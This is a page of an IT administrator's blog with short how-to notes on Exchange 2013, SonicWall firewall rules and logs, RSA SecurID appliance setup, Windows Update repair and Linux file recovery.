That should do it. Sometimes the binding to the SSL CERTIFICATE gets screwed up. There are other threads out there talking about "netsh http show sslcert" and to "netsh http add sslcert ipport" but this doesn't change it to the correct SSL CERT. Changing it to another SSL CERT is simply guessing which is an overall bad idea. We need to understand the problem.

Last Updated on Monday, 27 April 2015 08:26

Block Messages to Exchange Group Except From Certain Domains

Let's say you have a group called "Everyone". But you only want internal people to be able to email the group and possibly another company.

There are some other parameters in there too but that should do it.

If you want to do it visually:

  • -open the EAC.
  • -click MAIL-FLOW (on the left-hand side).
  • -click NEW.
  • -type: A-NAME-FOR-THE-RULE
  • -search for GROUP-NAME.
  • -click ADD > OK.
  • -type UNKNOWN USER or some other explanation.
  • -click MORE OPTIONS.
  • -click ADD EXCEPTION.
  • -type: domain1.com
  • -click +
  • -and so on.
  • -click OK > SAVE (at the bottom).
Last Updated on Friday, 26 June 2015 15:37

Block IP Address on Sonicwall

Let's say you have an IP ADDRESS on the WAN trying to perform a DDOS or a SYN-FLOOD attack to your location. Even though you have the DDOS attack proxied via FIREWALL-SETTINGS > FLOOD-PROTECTION as "Proxy WAN client connection when attack is suspected", you still want to send a message that these types of activities will not be tolerated.

Or you find out that the WAN IP ADDRESS is most definitely malicious as in the following IP from OFFSHORE RACKS:

This IP ADDRESS happens to be a Russian forum for DARKMONEY.CC. I can't even read the web site. It's irrelevant at this point. I know it malicious.

To block the WAN IP ADDRESS:

  • -set the "Zone" as WAN.
  • -Navigate to the Firewall > Access Rules page.
  • -Select the WAN to LAN button to enter the Access Rules (WAN > LAN) page.
  • -Click Add to open the Add Rule window.
  • -Select DENY as the Action.
  • -Select ANY as the Service
  • -Select Source as the address object or group created earlier.
  • -Select ANY as the Destination
  • -Click Add and Close.

The above is adapted from here:

The REAL-TIME-DEMO can be accessed here:

Last Updated on Tuesday, 31 March 2015 12:29

Collect Computer Names from Windows Server 2013

Here's an interesting one to collect all computer names in the active directory. Run from CMD:

CSVDE -f adexport.csv -r objectClass=computer -l “DN,cn,objectClass,lastLogon,lastLogonTimestamp,pwdLastSet,userAccountControl,operatingSystem,operatingSystemVersion,whenCreated,description”

Exchange 2013 Send Connector Load Balancing and Failover

In my recent article USING MANDRILL WITH EXCHANGE 2013, I show how to add Mandrill to Exchange as a SEND CONNECTOR. Further questions become:

1: How do I use it as a load balancer. In other words, how do I set it up so that some of the email goes through the second SEND CONNECTOR?

2: How do I use it as a failover? In other words, how do I set it up so that if the first SEND CONNECTOR doesn't route email, it re-routes through the second SEND CONNECTOR?

 Let's address each individually.

Load Balancer

The problem is this, multiple equal cost send-connectors will not balance. Or as I read, "When the cost of the Send Connectors and the proximity to their source servers are the same, Exchange will simply choose the one with the alphanumerically lower connector name, and will not load balance the outgoing email across both connections."

The actual way to load balance is when multiple smart hosts are configured on a single Send Connector the outgoing email will be correctly load balanced.

The problem becomes, if you try this in reality, you must use the same USERNAME & PASSWORD for all SMARTHOSTS, which isn't a possibility. And secondly, you cannot load balance both the local connection and a smarthost.

The workaround solution for crappy software is (reprinted from http://www.c7solutions.com/2012/05/highly-available-geo-redundancy-with-html):

by creating a fake domain in DNS. Lets say smarthost.local and then creating A records in this zone for each SMTP smarthost (i.e. mail.oxford.smarthost.local). Then create an MX record for your first site (oxford.smarthost.local MX 10 mail.oxford.smarthost.local). Repeat for each site, where oxford is the site name of the first site in this example.

Then you create second MX records, lower priority, in any site but use the A record of a smarthost in a different site (oxford.smarthost.local MX 20 mail.cambridge.smarthost.local).

Then add oxford.smarthost.local as the target smarthost in the send connector. Exchange will look up the address in DNS as MX first, A record second, IP address last), so it will find the MX record and resolve the A records for the highest priority for the domain and then round-robin across these A records.


Failover seems to be answered via the same path. The idea is create 1 send connector. The first MX record in the fake SMARTHOST in the SEND-CONNECTOR is back to the local system. The second MX record in teh fake SMARTHOST is to the remote SMARTHOST.

As per http://technet.microsoft.com/en-us/magazine/jj159083.aspx

First of all, ensure you have DNS A records for your mail gateways in place. Next, come up with a random name for your soon-to-be-created MX record in DNS. In this example, I chose allsmarthosts.forest1.local. Create the required MX records in DNS.

As with plain MX-based routing, Exchange will use the MX record with the higher priority, as long as it’s available. Now the only thing left to do is to reconfigure the Exchange Send Connector to read allsmarthosts.forest1.local as the only smart host.

By doing so, Exchange will use primary.forest1.local for outbound mail, as long as it’s available. Once it goes down or becomes unreachable, Exchange will start using secondary.forest1.local as the smart host. That’s what a little DNS trickery can do for you.


The idea of this is to use MANDRILL if for some reason mail is not being sent through the local connection (for example, blacklist). I didn't implement the solutions above simply because I don't think it will work with a SMARTHOST that requires a USER/PASS. I'm not willing to try. That's suicide by client.

In the end, software is set to work in a certain way. When it doesn't, trying to find workarounds is nearly impossible and seemingly pointless. The end result is that EXCHANGE 2013 isn't set to work this way. I wanted this to happen automatically. Since it doesn't, I'll just have to manually switch SEND CONNECTORS if the need arises. Maybe it doesn't matter a whole lot in an ever-increasing cloud world.

Last Updated on Thursday, 26 March 2015 14:57

Collecting Inventory

Collecting inventory is an increasingly difficult task to accomplish escpecially with the new licensing process with Microsoft. But MATRIX42 helps: https://www.matrix42.com

Syn Flooding Machine

In my article FIND COMPUTER ON NETWORK THAT IS SENDING OUT SPAM WITH SONICWALL, I indicate that the logs show the following:

46:26.9 Alert Intrusion Prevention Possible SYN Flood on IF X0 - src: dst:  <blank>  <blank>
46:30.6 Alert Intrusion Prevention SYN-Flooding machine on IF X0 - xx:xx:bb:62:2c:95 with SYN rate of 1001/sec blacklisted  <blank>  <blank>

This indicates that there is a SYN FLOODING MACHINE going at the rate of 1001 items per second. Wow! That's a lot. You can also see above that the DESTINATION is port 25. You can see that by the colon twenty-five (:25).


A SYN FLOODING MACHINE is a zombie machine participating in a DDOS attack. Uh-oh. Yup... Users. They weak point of all security systems.

A SYN FLOOD ATTACK directs packets to a listening TCP port on a victim server; typically a web server (port 80), an FTP server (port 21) or a mail server (port 25).

When a server receives a SYN packet it returns an ACK packet to the client to acknowledge it received the inital packet. More or less:

"Hi" the visitor said.

"How are you?" the host replied.

The problem is that the visitor never acknowledges with a "Just fine."

Until the visitor acknowledges the reply, the host server will keep that connection open until timeout. This is typically 75 seconds. Staring for 75 seconds.

If you've ever run a server before, you should know that the number of connections is finite. In QPSMTPD, this connection limit is set for an overall connection limit (default 40) {config setprop qpsmtpd Instances xx} and a limit per IP ADDRESS (default 5) {config setprop qpsmtpd InstancesPerIP xx}.

Once those connections are all used up, no more connections can be made.

So, in our logs above, our bad client machine on our network was sending about 1000 connections per second to the victim which happens to be owned by XO COMMUNICATIONS and leased by the SAN DIEGO SOURCE EMAIL SERVER secondary connection, mx2.sddt.com (priority 20).

mx1.sddt.com (priority 10) & mx3.sddt.com (priority 30) were not affected.

Last Updated on Tuesday, 24 March 2015 14:13

Using Mandrill with Exchange 2013

Using Mandrill with Exchange 2013 to send outgoing mail in case your IP ADDRESS gets blacklisted on SENDERBASE.ORG and your reputation takes awhile to get out of the POOR rating. There are two parts to this; creating a MANDRILL account and setting EXCHANGE to use MANDRILL.


Once you start an account, you will see your details for connection. It will look something like this:

  • Host: smtp.mandrillapp.com
  • Port 587
  • SMTP Username: foo@fee.tld
  • SMTP Password any valid API key

Now all you need is an API KEY.

  • -click NEW API KEY

Be patiance as it generates a new api key. It will display after about 20 seconds. Great! You should have your new API-KEY to be used as your SMTP-PASSWORD.

NOTE: It uses an api key rather than the password to your account so that you can change the password to your account without affecting the accounts ability to send email.


  • -click MAIL-FLOW (on the right-hand side).
  • -click SEND-CONNECTORS (at the top).
  • -click the plus symbol (+).
  • -type: Mandrill.
  • -bullet "Custom".
  • -click NEXT.
  • -bullet "Route mail through smart host".
  • -click the plus symbol (+).
  • -type: smtp.mandrillapp.com
  • -click SAVE
  • -click NEXT
  • -type: your-user-email-for-your-mandrill-account
  • -type: your-user-password-for-your-mandrill-account
  • -click NEXT
  • -click the plus symbol (+) for ADDRESS SPACE.
  • -leave TYPE as SMTP.
  • -type * (asterisk) for FDQN.
  • -leave COST as 1
  • -[This is preference. Works the same as MX RECORD preferences. The lower the cost, the more preference it has. 1 will be used before 2 and so on. An equal number will round-robin.].
  • -click SAVE
  • -[A "Scoped send connector" will only work internally for domains on the server.]
  • -click NEXT
  • -click the plus symbol (+) for SOURCE SERVER.
  • -if you only have 1 server, click ADD (at the bottom).
  • -click OK > FINISH.

This will automatically add the SEND CONNECTOR to the list and enable it.

Now we have to change the outgoing port for the MANDRILL SEND CONNECTOR.

  • -type: Set-SendConnector -Identity Mandrill -port 587

Great! Now you are ready to go.

You have a few options from here. You can either:

  • -start sending using the MANDRILL SEND CONNECTOR right away by simply enabling the connector (and disabling the existing connector if you have one).


  • -test out the MANDRILL SEND CONNECTOR by pausing the SEND QUEUE in the QUEUE VIEWER and enabling the connector (and disabling the existing connector if you have one).

That's it! You are awesome.

Last Updated on Wednesday, 09 May 2018 12:49

Block All Traffic on Port 25 in SonicWall

To block all traffic on port 25 in a SonicWall, follow this link:


Find How Many Exchange CALs You Need on Server 2012

To get the user-accounts of EXCHANGE that require a STANDARD EXCHANGE CAL's on a SERVER 2012:

  • -type: Get-ExchangeServerAccessLicenseUser –LicenseName “Exchange Server 2013 Standard CAL”

If you combine this with the wonderful GNUWIN32 (see below) then you can type the following to get the exact number you need:

  • -type: Get-ExchangeServerAccessLicenseUser –LicenseName “Exchange Server 2013 Standard CAL” | grep CAL -c


Fix Windows Updates | Windows Stuck During Windows Updates

net stop wuauserv
net stop bits
 ren c:\windows\softwaredistribution sd.old
net start wuauserv
net start bits


  • -boot from WIN8 cd.
  • -look for a Repair Windows.
Last Updated on Wednesday, 14 August 2019 16:36

Temporary Web Site Links

Sometimes a temporary web site link contains an IP ADDRESS and looks like this:

The issue is that the links in the web site won't work or the administrator panel (/administrator or /wp-login) won't work becase search-engine-friendly links are on.

This is resolved by using the SERVERNAME or FQDN rather than using the IP ADDRESS. Like this:


RSA Appliance Version 8 Reset Password

The Good About RSA Security Appliance

RSA is really secure.

The Bad About RSA Security Appliance

RSA is really secure so figuring out what the current password is, is just about so difficult that many have to revert to writing down the password to remember it. This, coincidentally, weakens security.

If you forget the SUPER-USER password in RSA APPLIANCE, then you might be in a tough place.

Here's how to reset the SUPER-USER password in RSA APPLIANCE VERSION 8 (very high level. This is not detailed information. I will not be explaining how to do step-by-step).

  • -ssh into the rsa-box
  • -change directories to: /opt/rsa/am/utils
  • -run the following command: ./rsautil restore-admin –u tempadmin
  • -follow the screen prompts. You will need your OC username & password (not SC username & password).
  • -user the tempadmin account to reset the SUPER-USER account.

NOTE: the tempadmin user access expires after 24 hours.

Exchange 2013 Reset Password for Users

In Exchange 2013, resetting the password for users can be difficult. It might be missing or you may not see the option when you click on a USERNAME.

Luckily, this isn't difficult to overcome. I found the steps here:

  • -click PERMISSIONS (on the left-hand side).
  • -click ADMIN-ROLES (at the top).
  • -double-click ORGANIZATIONAL MANAGEMENT (in the middle).
  • -find the ROLES section.
  • -click the + (plus-symbol).
  • -find RESET PASSWORD (in the list).
  • -click ADD (at the bottom).
  • -click OK > SAVE.
  • -logout of EAC.
  • -login to EAC.

This should enable you to change the passwords within EXCHANGE EAC.


Business One Centos

NOTE: this project was killed. I will not pursue.

If I'm going to work with BUSINESS ONE, I'm dedicated to getting working on HANA on CENTOS. I haven't done this yet as I don't have access to some of the build items but if it's possible, I'm going to get it working. I will post the results here.

The last direction I want to take is have to put this on some type of crappy MS server box.

This is a posting area for my notes:






NOTE: this project was killed. I will not pursue.

Last Updated on Wednesday, 17 May 2017 10:19

Perfect Software

There is no perfect software in the world. The big question is, "Will it work for us and do what we want it to do?" That question will only be answered through time.

2 Moment You Know That Software Will Not Work

Usually, you will stick with software until one of two moments occur.

First, the moment when the software doesn't do what you want/need it to do. Eventually, you will get to a point where you need it to do something. Either is can or it can't. When it can't, is the break point moment at which you start looking for something else. For example, you need it to track technicians. If it doesn't, then it doesn't work for you. It's as simple as that.

Secondly, when something better comes along. Something new, something hip, something that does tricks will catch your attention through either a friend, colleague or competitor and you will salivate because your software doesn't do it that good. This is simply the grass is greener on the other side.


There is no perfect software and I know all too well that software is simply a tradeoff. Having it do certain items really well and having it not do certain items well is in every software. The look and feel, the interaction, the interface, the upgrades, sooner or later you will see that all software is simply trading one aspect for another. My wife will usually choose the one that looks pretty and works reliably. Hence her iPhone 6. I choose works reliably as a top priority and usually stay away from the bleeding edge technology. It's nothing more than a tradeoff.

4 Sofware Principles to Focus On

In light of this, and with a handful of experience from a tech perspective, I have four unconventional areas that I typically focus on. They are:

1-automating best practices:

Too often software is concerned with customization (you can eventually get there) rather than focusing on what needs to be done (here is the shortest path). The answer to this is simple. If software is automating best practices, then this is a good signal the software company is a good fit and focusing on customer needs.


I shouldn't need a masters degree to run/setup/maintain the software. Easily adapting from my current knowledge base is key. A simple interface and hiding the complexity behind the curtain is the second signal.


This means the software should have the option to extend beyond. Beyond what? You might ask. Beyond it's current state. This issue is the future. The unknown. There needs to be an outlet for the unknown items that the future holds. Having a way to tap into that is vital to the survivability of software.


This means that the software should work the first time, every time. Anything less is unacceptable. If anything is shown to be insecure, it needs to be replaced with the best available option.

I didn't come up with these items sitting under a tree. They came from reading the works of Gordon Rowell. I was lucky enough to meet with Rowell a few years back and it's amazing how true these principles still hold true today.


Rename the WordPress Admin Login

Note to myself. Here's how to rename the WordPress Admin Login:

Want to make your Wordpress Web Site Run Faster?

Want to make your WordPress web site run faster? Use Better WordPress Minify.

  • -install it.
  • -run it.
  • -let it do it's work.

Duplicate jQuery

Just a mental note for myself to click here if I need to remove duplicate jQuery is some CMS's:


How to Encrypt USB Drives

There's probably many ways to encrypt USB drives but to make everything easy, I've used the software here:

It creates an encrypted, password-protected folder on the USB stick. If the USB stick gets lost/stolen, the new person will not be able to access any of the information on the USB stick.

Last Updated on Tuesday, 16 December 2014 14:23

RSA Security Console Setup

Client needs RSA Security Console setup so that when you connect to the VPN, it asks for a TOKEN (instead of a password).

The Big Idea

The TOKEN comes from a KEY FOB. It's a little device that you typically put on your keychain of your car/house. You press the only button on the device and it does one thing, give you a TOKEN. A TOKEN is a bunch of letters and numbers.

So it goes like this:

  • -press button.
  • -it displays: 123ABC
  • -you connect to VPN.
  • -you type in the USERNAME.
  • -you type in the TOKEN.
  • -you type in a PIN/PASSWORD.
  • -you gain access.

The benefit here is that if your password gets compromised, it doesn't help the other person. They also need the TOKEN.

Think of it like you house. You need a key to access the house. If you don't have the physical key, you can't access the house. Same idea here. If you don't have the physical TOKEN, you can't access the house of data.

I've used this before but I've never set one up. Setting it up is a pain.

Purchase Equipment

The first hurdle to overcome is purchasing the equipment. I thought it was just software that installs on the WINDOWS SERVER 2012. Upon calling EMC (the company that owns RSA) they talked for about 15 minutes. When I asked for the next step, they prompted me to call one of their authorized dealers. Hmmmm... Not that I'm not grateful for the talk but in my mind, it would have been nice to know that upfront.

Getting the quote from CDW that only included software, I ran it by my new friend at EMC to make sure I had all the necessary parts. I want it working right the first time. EMC quickly pointed out that I also needed a hardware appliance (since the client isn't using virtual server).

Installing the Equipment

I've often said before that large companies are nothing more than crappy software with great marketing. The same holds true here. Upon getting the equipment and inspecting it, the hardware appliance is some sort of 1U server from MBX-like house that will powder coat your brand on the faceplate.

The rails are different in that they don't use typical holders. It has some type of quick setup rail system. Kinda cool. I always disliked the whole screw thing anyway.

First Impressions

Upon starting it up, it seems to running some type of Linux with an apache/httpd server (update: it's actually SUSE Linux Enterprise Server 11 (x86_64), VERSION = 11, PATCHLEVEL = 3 with an Oracle WebLogic Server). Make a change in the web-console and the value is changed in the config file and the service is restarted. I get the idea. Sounds familiar.

Everything is controlled via the web console. The web console is comprised of 3 areas:

(assign tokens)

(sync users between systems, date, time, network, etc)

(users can set PIN's and update their info)

Setup Users

You can setup the users via INTERNAL DATABASE or sync the users with an EXTERNAL DATABASE. This external database is typically an LDAP read-only database. This means it can be WINDOWS SERVER ACTIVE DIRECTORY or it can be an OPEN LDAP on RHEL/CENTOS.

The sync will only happen via a SECURE CONNECTION meaning LDAPS. So funny thing is that WINDOWS SERVER 2012 has their own way of dealing with CERTIFICATES which makes this nearly impossible. What's worse is that if the sync fails, it simply says "failed." It doesn't say why or what happened or give any log info.

I tried a couple of times but I couldn't get mine to sync with AD. So I threw in the towel and went to INTERNAL DATABASE.

  • -login to https://rsa-server/sc
  • -nothing shows up because it's an LDAP. You have to do a search.
  • -click SEARCH (on the bottom right).
  • -all the users show.
  • -click ADD NEW (at the top).
  • -add the user.
  • -repeat if necessary.

Import Tokens

While the example at the beginning of the article talked about a KEY FOB (or hard-token), in recent years, most will simply use their smart phone (or soft-token). In either case (I suppose), the tokens have to imported into the system.

The tokens come on a CD package. The password for the tokens come on a second package.

  • -put the CD into the system you are sitting at and using to access the web console.
  • -copy the file on the CD to the DESKTOP (it's an XML file).
  • -login to https://rsa-server/sc
  • -keep the defaults.
  • -browse for the file and select the XML on the DESKTOP.
  • -type in the password (from the second package).
  • -click SUBMIT JOB.

The job should go through smoothly. If not, double-check the password and make sure you are using the file copied to the desktop. Sometimes, the system cannot "consume" the file if it is read-only.

 Setup a Software Token Profile

A Software Token Profile has to be created before assigning the tokens. The profile determines items like:

  • -what kind of device the token can be used on.
  • -how long the token lasts.
  • -the length of the token.


  • -login to https://rsa-server/sc
  • -name the profile anything you want.
  • -select the device type.
  • -select the length of the token (6 digits or 8 digits).
  • -select the time-frame of the token.
  • -select CT-KIP.

In the ATTRIBUTES section, there are 2 attributes. The first is the STRING that only allows it to be installed on the DEVICE TYPE you selected. For example, it can only be installed on APPLE DEVICES. The second section is the default name of the token. I'll explain later. For now, type "MY TOKEN."


  • -leave the first attribute as the default value.
  • -type: MY TOKEN (for software token nickname).
  • -click SAVE.


Before you dish out the TOKENS, the users must have the RSA APP installed on their device, in this case the IPHONE. This sucks because now everyone has to have an APPLE-ID to continue which is it's own set of instructions.

Nevertheless, go to the APP STORE and install the RSA SECURID SOFTWARE TOKEN.

Note that the RSA APP won't work until it has a TOKEN installed. This is what confuses most people. They think, "I just installed the APP. Why doesn't it just work?"

Assign Token to Users

Now here is the fun part. We assign the tokens to the users. You can either assign the tokens in bulk or you can assign them one-by-one. I would love to think that going bulk would work but realistically, going one-by-one is probably easier in the long run.

  • -login to https://rsa-server/sc
  • -click the UNASSIGNED tab (at the top).
  • -click the top token.
  • -click ASSIGN TO USER.
  • -the user-panel shows but since it's LDAP, nothing shows.
  • -click SEARCH (in the bottom-right) to show all the users.
  • -bullet the user-you-want.
  • -click ASSIGN (at the bottom).

Distribute the Tokens

Distributing the TOKENS is an additional step. Without distributing the TOKENS, the users have nothing more than an APP installed on their phone.

Go back to the token list (assigned):

  • -login to https://rsa-server/sc
  • -click the token-you-want-to-distribute.
  • -click DISTRIBUTE.
  • -select the SOFTWARE-TOKEN-PROFILE already created.

Now remember those attributes? Here's where you can customize them for each user. The first attribute (DeviceSerialNumber) can be changed so that the TOKEN will only install on the IPHONE belonging to the user (rather than just any IPHONE). The second attribute will let you customize what the user will see when they click on the RSA APP.

To get the specific DEVICE-SERIAL-NUMBER:

  • -get the iphone.
  • -open the RSA app.
  • -click INFO button (at the bottom-right).
  • -the BINDING-ID is the ID that needs to be typed into the DeviceSerialNumber attribute.
  • -you can either email this to the super-admin (by clicking the email button next to the number) or you can tell him the number or you can just hand your phone to him/her.
  • -type in a NICKNAME (so that it shows something other than just "Token 1").
  • -select SYSTEM-GENERATED-CODE if the ACTIVATION-CODE (keep reading) is random or if the ACTIVATION-CODE is known as the DEVICESERIALNUMBER.
  • -click SAVE & DISTRIBUTE.

Upon doing so, the admin has the option to distribute the TOKEN. Typically, that is done via email. After all, if it will only work on the specified device, there's really no harm in emailing the token. Is there?

At this point, you have another option, you can either:

  • -email the whole token.
  • -or you can email part of the token and force it require an ACTIVATION CODE.

If you require the ACTIVATION CODE, you will have to get that ACTIVATION CODE to the user. Good luck.

This whole process is complicated but it allows you to put as much security into your system as possible.

I opt to make it easy as possible while still maintaining security and assign the token directly to the device and I opt to email the whole token with activation code for a push-one-button install.

What happens

What happens if you try to install a TOKEN onto a device that isn't in the DEVICESERIALNUMBER?

It will ask you for the ACTIVATION CODE. Then it will say, "Token import failed. Invalid activation code. Contact your administrator."

Pretty cool. The TOKEN will only work on the device assigned to the TOKEN.

Everywhere, users are screaming "SECURITY!!!"

Integrating the RSA into Something

What's cool here is that the RSA appliance can be used to protect a few different items. Possibly you want it to protect a web site, a VPN or simply the computer system itself. It can protect all of these and integrate into just about anything. Theoretically anyway.

So far, I have witnessed protecting a web site. Protecting a computer system.

The VPN protection can be via Windows VPN or it can be via SonicWall VPN. The SonicWall has RSA integration capabilities.

To be able to secure an item, typically the item will use a SECURITY AGENT. This is a fancy term for a bit of code that integrates into the item you are protecting so that the USER/PASS request is sent to the RSA SERVER rather than the web site, AD server, etc.

Integrating the RSA into the RRAS (Windows VPN)

As of this writing, this isn't possible. I talked to RSA tech support. RSA doesn't integrate into RRAS/Windows 2012 VPN. It's on the roadmap and I'll be notified once it's complete.

Some items suggest that the RSA integration is via an authentication agent found here:

Other items suggest this may be possible via RADIUS. For example, the horses-mouth docs say that VPN is done through RADIUS here:

And it gives instructions here:

Integrating the RSA into SonicWall VPN

The RSA can be integrated into the SonicWall VPN without too much trouble. SonicWall is it's own topic unto itself. I won't go into all the details of the SonicWall or else we will be writing/reading a book.

The SonicWall has 2 types of VPN. The GLOBAL-VPN (GVPN) and the SSLVPN. For many reasons, pretend like the GLOBAL-VPN doesn't exist and simply go straight to the SSLVPN.

On this regard, to get the SSLVPN working, I'll simply refer to this awesome YouTube video:

At some point, I'll write out the instructions but for now, the above link will suffice.

After the VPN is up and running, we have to integrate the RSA users into the SONICWALL. On this section, to get the RSA users into the SONICWALL, I'll simply refer to this awesome DELL KB post:

It uses RADIUS, so the RADIUS SERVER must be setup on the RSA and the RADIUS CLIENT must be setup on the SONICWALL.

Final VPN steps

So to get this working, you must have the SONICWALL VPN software setup on the laptop. What's cool here is that the software is embedded into firmware in the SONICWALL. This software should install automatically upon visting the VPN/SONICWALL web site but I'm finding that if the SSL is SELF-SIGNED and not originated from a TRUSTED-STORE then the software doesn't download/install correctly.

To get around this, you can manually install the software from the SONICWALL VPN web site here:


So to recap, here are the steps why the RSA is so secure and the high-level steps needed:

-must have company iphone/device.
-token can only be installed on company iphone/device.
-enter PASSCODE for general iphone access.
-press RSA token app.
-type pin.
-press enter.
-see token.
-type token into vpn software.

    -token is one time use only. Once you try it, it won't work again. You will have to wait for another token.
    -just be clear, you cannot test token and then use it.
    -if you don't enter the pin before getting a TOKEN, it will give a TOKEN but it will be the wrong one.


The RSA package lives in:


It has it's own SERVICE. Rather than the typical:

service biztier status

RSA calls it rsaserv puts it here:


So checking the RSA services goes like this:

./rsaserv status all

RSA puts all the unique services here:


This is different than placing it in the typical directory of:


External References

This has helped:


Last Updated on Tuesday, 11 April 2017 13:30

GPO Settings for IE11

Well it looks like at this time the settings for IE11 are left out of the GROUP-POLICY settings in SERVER 2012.

Here's how to get them.

  • -download the ADM TEMPLATE here: http://www.microsoft.com/en-gb/download/details.aspx?id=40905
  • (unizip it of course)
  • -open the GPO on the SERVER 2012.
  • -click ADD
  • -select the unzipped file.
  • -awesome!

The next part to this is to change the settings in the GPO for IE 11.

  • -open the GPO on the SERVER 2012.
  • -right-click INERNET-SETTINGS
  • (While IE 11 doesn't show, the settings for IE10 will work for IE 11)

Sagonet DataCenter

After having a client server at Sagonet DataCenter, I can make the recommendation to try and find another solution.

Here is my history of more than 7 years with 8 significant issues. Keep in mind that every issue cause more than 100 people to either call or email asking questions. Plus it reflected poorly on the client business and was witnessed as unreliable.

11/28/08: power failure. Outage due to under supplied power blamed on FPL causing the backup car batteries to have zero power.

08/29/09: Aug 28 23:13:37 server kernel: You probably have a hardware problem with your RAM chips
Aug 28 23:13:37 server kernel: Uhhuh. NMI received. Dazed and confused, but trying to continue

07/16/10: backup options $140 per month

12/13/11: access from comcast issue. Locations at Comcast couldn't connect.

06/02/12: server unavailable... suddendly re-appeared.

06/20/12: hd died.

09/21/12: access from comcast issue. Locations at Comcast couldn't connect.

01/14/14: all of tampa unavailable for several days. No response for more than 24 hours. When response was received, it was "we are working on it."
Panicked, I tried to move to new datacenter.
Server crashed during transfer to new server.


The bright side to all of this is that it obviously forced the client to get a new server at a new datacenter with whom I am very pleased.

My recommendation is that if you have an enterprise, host at RackSpace. It's pricey but you get what you pay for.

Last Updated on Sunday, 16 November 2014 06:05

Recover Accidentially Deleted Files

Need to recover files that are accidentially deleted? Who hasn't dropped over 103 mysql databases by typing in the wrong commands at one point or another? Here's my recommendation:

  • testdisk.
  • ext4magic
  • r-studio

-lvm vgscan
-lvm lvscan
-lvm vgchange -a y
-lvm pvscan
-lvm lvscan
-lvm vgrename main mainold

fdisk -lu /dev/sdb
mdadm -AR /dev/md8 /dev/sdb2
lvm vgscan
lvm lvscan
lvm vgchange -a y
mkdir -p /mnt/olddrive
mount -t ext3 /dev/mainold/root /mnt/olddrive


ext4magic -R -f /dev/olddrive/var/lib/mysql -d /installs/RECOVERDIR1
ext4magic /dev/olddrive/var/lib/mysql -j /installs/BACKUPPATH/journal.copy -d /installs/BACKUPPATH -m -R

ext4magic -R -f /dev/olddrive/var/lib/mysql
ext4magic -R -f /dev/mapper/mainold-root var/lib/mysql
ext4magic -R -f /dev/md8 var/lib/mysql
ext4magic -R -f /dev/sdb2 var/lib/mysql
ext4magic -R -f var/lib/mysql


Last Updated on Sunday, 16 November 2014 05:55

Find Computer on Network that is Send Out Spam With SonicWall

So you have a network. One of the devices on the network is sending out spam at an amazing rate. How do you find and locate the misbehaving computer?

If you have a SONICWALL, you can look at the current connections across all your devices at any given time.

  • -login to SONICWALL.
  • -find the DIAGNOSTIC TOOL area.
  • -change the dropdown to CONNECTIONS-MONITOR

This will show all the connections from the outside network to the inside network and vise-versa. You are looking for any connection with a DESTINATION PORT of 25. Should be pretty obvious as it will be the IP ADDRESS that is NOT your internal mail server. It will be the IP ADDRESS that is a client machine (laptop/desktop).

But this only shows the current active connections. What if the laptop went home? What if you want to search through the logs for the day?

  • -login to SONICWALL.
  • -click LOG > VIEW
  • -find PRIORITY
  • -change to ALERT
  • -click APPLY FILTERS

This should show a list of ALERTS in the last 24 hours or so. Carefully look through them to see if anything is sending to PORT 25.


What's interesting is that in a typical situation the logs typically look like this:

Time Priority Category Message Source Destination
32:13.7 Alert Intrusion Prevention Possible port scan detected, 443, X1, 56114, X5

The destination and port number are easily available.

In my situation, the log look like this:

46:26.9 Alert Intrusion Prevention Possible SYN Flood on IF X0 - src: dst:  <blank>  <blank>
46:30.6 Alert Intrusion Prevention SYN-Flooding machine on IF X0 - xx:xx:bb:62:2c:95 with SYN rate of 1001/sec blacklisted  <blank>  <blank>

The destination isn't in the DESTINATION column but rather in the MESSAGE column.

Regardless, with this information, I now know that client is the machine causing an issue.

Last Updated on Monday, 23 March 2015 14:41

Exchange 2013 Message Queue

To look at the message-queue in EXCHANGE 2013, it's actually rather easy.

  • -click QUEUE-VIEWER

Here you will see any messages that are waiting to be delivered. Sometimes a receiving server might delay the message or the receiving server might simply be not available, in which case, the message will wait to be sent again. After a certain period of time, I believe that it's 48 hours, the message will bounce as undeliverable or NDR.

Linux Logs for Login Attempts

Logs for logins are located here:

The current login status.

The historical login status.

The failed login status.

You can't read these files directly, you have to use the following command: last

So, it would go like this:

last -f /var/run/utmp

Or if you want to see something scary use:

last -f /var/log/btmp

Page 3 of 5

Contact Dak Networks

Please contact us at the following.